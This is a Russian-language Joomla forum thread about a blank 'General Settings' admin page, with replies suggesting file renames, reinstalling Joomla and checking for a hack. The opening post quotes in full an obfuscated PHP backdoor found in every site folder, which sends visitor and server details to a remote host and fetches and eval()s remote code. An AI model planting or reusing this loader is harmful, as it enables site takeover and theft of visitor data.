0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 13257 Просмотров
*

SparMax

  • Новичок
  • 6
  • 0 / 0
Открываю в админке "Общие настройки, появляется пустая страница с ссылкой <название сайта>.ru/administrator/index.php?option=com_config
Все остальное работает нормально.
Абсолютно в каждой папке public_html, везде есть по одному файлу типа 151247.php или 22446.php, в каждой папке разное название из цифр. Весят они одинаково (2кб), а содержится в них следующее:
Цитировать
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ffed22181d5c4b87dd6e20248545fd92") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Так что же это за загадочные файлы и почему не работают "Общие настройки" ? Никаких махинаций не проводил, скрипты и модули в последнее время не устанавливал.
« Последнее редактирование: 05.03.2010, 20:37:43 от SparMax »
*

dezza

  • Новичок
  • 2
  • 0 / 0
Открываю в админке "Общие настройки, появляется пустая страница с ссылкой <название сайта>.ru/administrator/index.php?option=com_config
Все остальное работает нормально.

Присоединяюсь к вопросу. То же самое после переезда на другой хостинг
*

dezza

  • Новичок
  • 2
  • 0 / 0
Нашел. /administrator/components/com_config/views/application/tmpl - здесь при переезде у некоторых файлов к расширению добавилось 000640, например, вместо config_seo.php он назывался config_seo.php000640

И так в трех файлах. Переименовал, все заработало.
Чего и вам желаю)
*

Deyo

  • Новичок
  • 4
  • 0 / 0
Не открываются "Общие настройки" в админке сайта joomla

Та же проблема после резервного восстановления сайта.

не работает: Общие настройки, Менеджер плагинов, Пользователи.
При заходе в одно из трех пунктов в админке выкидывает на пустую страницу

При заходе в общие настройки выдает - название_сайта/administrator/index.php?option=com_config
При заходе в пользователи выдает - название_сайта/administrator/index.php?option=com_users
При заходе в плагины выдает - название_сайта/administrator/index.php?option=com_plugins

Возможно есть и другие пробелы, но пока нашел только это.
С чем связано не знаю. Проверял доступ к папкам, все в порядке, а админке как суперадмин, с фронтасайта все работае. Помогите пожалуйста. Что нужно исправить? В чем может быть проблема.

*

baykonyr177

  • Новичок
  • 10
  • 2 / 0
Не открываются "Общие настройки" в админке сайта joomla
 Помогите пожалуйста. Что нужно исправить? В чем может быть проблема.



Присоединяюсь к выше-цитируемому!

 " при переезде у некоторых файлов к расширению добавилось 000640, например, вместо config_seo.php он назывался config_seo.php000640"
Это дело в моем случае не прокатывает.
*

baykonyr177

  • Новичок
  • 10
  • 2 / 0
Перезалить archive  на хостинге 8) и ноу проблем.
« Последнее редактирование: 01.10.2012, 10:28:40 от baykonyr177 »
*

Sergey1975

  • Новичок
  • 14
  • 0 / 0
Таже проблема. При заходе в админке на "Общие настройки" белый экран. Все остальные вкладки работают. Кто разобрался с данной проблемой отпишитесь в теме!
*

Sergey1975

  • Новичок
  • 14
  • 0 / 0
Ребята, кто решил проблему - поделитесь решением!
*

dr_gonzales

  • Захожу иногда
  • 104
  • 3 / 0
Была проблема. Joomla 1.5.22.
Ломанули 2 сайта, был редирект на какое то левое г. Сломали эти ребята: Sejeal. Они картинку оставляют свою.
Поменял .htaccess и configuration.php (если не изменяет память).
На одном из сайтов во все директории добавился файл index.old.php. Не открывались "общие настройки" в админке.
Выкачал все на локалку, удалил все  index.old.php, файлов было около 2 тыс., залил обратно, все заработало.
Дыра, скорее всего, в JSE. Нужно обновить до последней версии. И на бусурманском форуме обсуждали как раз мою проблему http://forum.joomla.org/viewtopic.php?f=431&t=786575

*

chessa

  • Новичок
  • 9
  • 0 / 0
Кто-нибудь решил вопрос, почему не открываются страницы??
Не открываются "Общие настройки" в админке сайта Joomla


не работает: Общие настройки, Менеджер плагинов, Пользователи.
При заходе в одно из трех пунктов в админке выкидывает на пустую страницу


*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
включите отображение ошибок PHP, смотрите error лог на серевере, перезалейте Joomla из установочного архива
Разработка, доработка расширений для Joomla!
*

chessa

  • Новичок
  • 9
  • 0 / 0
evgen777, спасибо, что откликнулись :-)
включите отображение ошибок PHP, смотрите error лог на серевере, перезалейте Joomla из установочного архива
включила в htaccess - выдает ошибку 500. Перезалила из дистрибютива папку administrator. Все стало открываться, кроме закладки  "общие настройки". Какие варианты?
*

litokno

  • Новичок
  • 7
  • 0 / 0
Открываю в админке "Общие настройки, появляется пустая страница с ссылкой <название сайта>.ru/administrator/index.php?option=com_config
Все остальное работает нормально.

Joomla 3.1 Та же проблема. Почему не открываются страницы?
*

dr_gonzales

  • Захожу иногда
  • 104
  • 3 / 0
скорее всего хакнули.
нужно смотреть наличие левых файлов, а проще перезалить.
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
скорее всего хакнули.
нужно смотреть наличие левых файлов, а проще перезалить.
думаю что на 100% взломали, ищите поврежденные файлы
*

litokno

  • Новичок
  • 7
  • 0 / 0
Joomla 3.1 Та же проблема. Почему не открываются страницы?

Написал hc в техподдержку. Подождем
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Написал hc в техподдержку. Подождем
вот всегда интересно Ваш сайт при чем тут ТП хостера, если пошлют лесом полностью правы будут
*

litokno

  • Новичок
  • 7
  • 0 / 0
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Ошибка 500 при входе в каталог tmp

Автор macheninarctica

Ответов: 8
Просмотров: 2008
Последний ответ 08.06.2018, 16:20:41
от ProtectYourSite
Изменить текст на вкладке браузера с "главная" на название сайта

Автор EvgeniyyB

Ответов: 11
Просмотров: 13093
Последний ответ 07.03.2018, 15:50:48
от vetalist
Вопрос по настройке новостной ленты на главной странице сайта

Автор jaff

Ответов: 13
Просмотров: 4983
Последний ответ 15.09.2017, 15:49:19
от sect
Произошел сбой сайта, пишет ошибку

Автор alex86r93

Ответов: 8
Просмотров: 1218
Последний ответ 28.03.2017, 18:11:57
от alex86r93
После переноса сайта на хостинг вылезает ошибка

Автор hausofdima

Ответов: 6
Просмотров: 1052
Последний ответ 20.03.2017, 23:53:39
от darkghost